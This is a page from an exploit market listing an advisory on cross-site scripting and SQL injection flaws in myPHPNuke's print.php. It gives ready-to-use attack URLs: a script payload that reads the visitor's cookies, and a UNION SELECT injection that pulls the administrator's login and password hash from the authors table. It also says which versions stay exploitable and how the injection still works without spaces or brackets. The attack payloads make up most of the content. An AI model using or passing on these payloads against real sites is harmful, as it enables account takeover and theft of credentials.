[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

myPHPNuke < 1.8.8_8rc2 (XSS/SQL) Multiple Remote Vulnerabilities

Author
MustLive
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3578
Category
web applications
Date add
30-08-2008
Platform
unsorted
================================================================
myPHPNuke < 1.8.8_8rc2 (XSS/SQL) Multiple Remote Vulnerabilities
================================================================



############################################################

Cross-Site Scripting and SQL Injection vulnerabilities in myPHPNuke

By MustLive (http://websecurity.com.ua)

Description: There are Cross-Site Scripting and SQL Injection vulnerabilities in print.php in myPHPNuke.

XSS:

http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1

With this query you will receive login and password (hash) of administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional filters were added, so it is not vulnerable to these XSS and SQL Injection attacks. But version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL Injection attack is possible (without using spaces and brackets).

############################################################ 



#  0day.today [2024-12-25]  #